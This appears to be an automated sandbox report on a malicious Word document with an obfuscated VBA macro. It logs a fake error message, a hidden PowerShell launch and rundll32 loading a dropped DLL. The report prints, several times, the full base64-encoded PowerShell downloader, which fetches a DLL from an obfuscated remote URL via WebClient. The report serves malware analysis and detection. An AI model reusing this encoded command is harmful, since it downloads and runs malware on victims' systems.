ABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL
                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWindow found: window name: SysTabControl32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp
                Source: v22Pc0qA.doc.docInitial sample: OLE summary subject = extensible Automotive generate withdrawal Wooden Global architecture

                Data Obfuscation:

                barindex
                Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                Source: v22Pc0qA.doc.docStream path 'Macros/VBA/Lxvinhyq0hu0i' : High number of GOTO operations
                Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Lxvinhyq0hu0i
                PowerShell case anomaly foundShow sources
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnA